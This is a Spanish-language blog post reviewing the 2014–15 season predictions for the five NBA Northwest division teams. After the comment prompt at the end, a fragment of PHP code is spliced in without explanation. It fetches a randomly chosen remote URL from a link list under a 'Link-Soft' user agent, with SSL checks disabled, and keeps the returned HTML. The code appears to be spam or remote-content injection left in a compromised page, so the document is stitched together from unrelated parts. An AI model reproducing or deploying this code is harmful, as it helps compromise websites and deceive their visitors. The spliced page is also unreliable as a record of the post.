Revisando los pronósticos 2015: Northwest

14 de March de 2015 por TheDeerHunter

Es hora de revisar nuestros augurios de inicio de temporada para la Northwest. Lamentablemente, a la hora de hacer las previas de todos los equipos nos dejamos dos análisis pendientes, ambos pertenecientes a esta división, así que aprovechamos para reparar el agravio en la medida de lo posible.

PORTLAND TRAIL BLAZERS

Pronóstico Octubre 2014: Por encima de las 50 victorias. Primera ronda.

Probabilidad de acierto: Media.

Calificación pronóstico: C

De manera casi milagrosa hemos tenido a los Blazers otra vez arriba en el salvaje oeste, con una de las plantillas más cortas aunque, eso sí, una de las parejas más letales de toda la liga. Aprovecharon bien los problemas de Oklahoma para dominar cómodamente la división menos exigente de la conferencia y para colarse en la parte alta del cuadro. No obstante, sus méritos son indiscutibles, codeándose con la élite de la liga en todos los aspectos del juego. Se mueven en una proyección incluso superior a nuestras previsiones a pesar de la baja particularmente sensible para ellos de Matthews. No tienen garantizada una primera ronda favorable, ni la ventaja campo, pero pueden contar con opciones contra cualquier rival que se les presente.

OKLAHOMA CITY THUNDER

Pronóstico Octubre 2014: N/D

De manera incomprensible, por primera vez en la historia del blog se nos quedaron algunos análisis en el tintero. De manera aún más incomprensible uno de ellos fue el de los Thunder, llamados a ser uno de los aspirantes a final de conferencia. Apostaría a que en ningún caso lo hubiéramos acertado, porque ni en sus peores pesadillas hubieran imaginado una campaña tan cuesta arriba. Los problemas físicos de Durant y Westbrook, unidos a la creciente distancia entre el rendimiento del dúo y del resto de la plantilla, les creó dificultades incluso para entrar en plazas de postemporada. A pesar de que han sabido moverse en el mercado de mitad de curso para equilibrar la plantilla, lo tienen muy complicado para alcanzar unos cruces favorables. Una vez allí, como siempre, estarán en manos de su fabuloso dúo para intentar obrar el milagro de terminar entre los mejores del curso. El reloj biológico juega muy en su contra a estas alturas.

DENVER NUGGETS

Pronóstico Octubre 2014: 50 victorias. Playoffs. Primera ronda.

Probabilidad de acierto: Remota

Calificación pronóstico: D-

Inaceptable campaña de los Nuggets tanto desde el punto de vista individual como colectivo. La temporada se puede resumir en una larga racha de derrotas salpicada de pequeñas rachas de victorias. La defensa ha sido una de las más pobres de la competición, mientras que en ataque ni en sueños se han acercado a aquel “110 por noche” que vaticinábamos. Si el nivel de un entrenador se mide en sacar el mejor rendimiento de su plantilla, queda perfectamente justificado el despido de Brian Shaw. En la previa calificamos el fichaje de Afflalo como “sacar oro a cambio de nada” pero el que fue considerado por muchos como “uno de los 5 mejores escoltas de la temporada pasada” este año sería claro candidato también al premio de “most ruined player of the year” en caso de existir y ha terminado literalmente “largado a cambio de nada”. Del resto, se puede salvar a muy pocos. En definitiva, temporada para olvidar. La peor de la última década.

UTAH JAZZ

Pronóstico Octubre 2014: N/D

Otro análisis que se nos fue al limbo. Quiero creer que, de haberlo publicado, no nos habríamos alejado mucho del resultado. El Oeste no espera a nadie y los Jazz no habían tirado la casa por la ventana precisamente en el mercado de agentes libres. La gran apuesta llegada del draft, Dante Exum, está demasiado verde para suponer un salto de calidad significativo. De hecho, el gran acierto que parecía haber sido Trey Burke se ha desinflado un poco en su año sophomore. El objetivo, en cualquier caso, no ha pasado en ningún momento por sumar un gran número de victorias, sino por hornear a sus jóvenes perlas a fuego lento. En ese sentido no está siendo un mal año. Hayward, Favors, Gobert y Burks progresan adecuadamente. Kanter, por su parte, ha sido vendido en la locura del trade deadline. El curso que viene ya les deberíamos empezar a exigir acercarse a postemporada.

MINNESOTA TIMBERWOLVES

Pronóstico Octubre 2014: Alrededor de 25 victorias. Zona baja del Oeste.

Probabilidad de acierto: Media

Calificación pronóstico: C+

Era fácil prever que no iba a haber muchas alegrías en el Target Center este año. Lo cierto es que pocas veces las ha habido y con el cambio de cromos entre una “superestrella” consagrada y algún melón por abrir, unido a la tradicional falta de suerte en el tema de lesiones, la campaña ha sido un padecer casi constante. Tan sólo se podrá recordar alguna puntual satisfacción, como el RoY que probablemente se llevará Wiggins (así como el MVP del partido de jóvenes del All-star, si es que alguno nos acordamos pasado mañana), los espectaculares mates de LaVine, el día que Mo Williams parecía “Chicho Terremoto” o que por fin le vimos a Ricky un remoto parecido a Pistol Pete, por aquello de meter 8 puntos en un minuto a unos adormilados Grizzlies. También, cómo no, el regreso de Garnett a la casa que le vio sus momentos individualmente más brillantes. Toca esperar tiempos mejores. A ver si se llevan el pick 1 para añadir a la lista.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>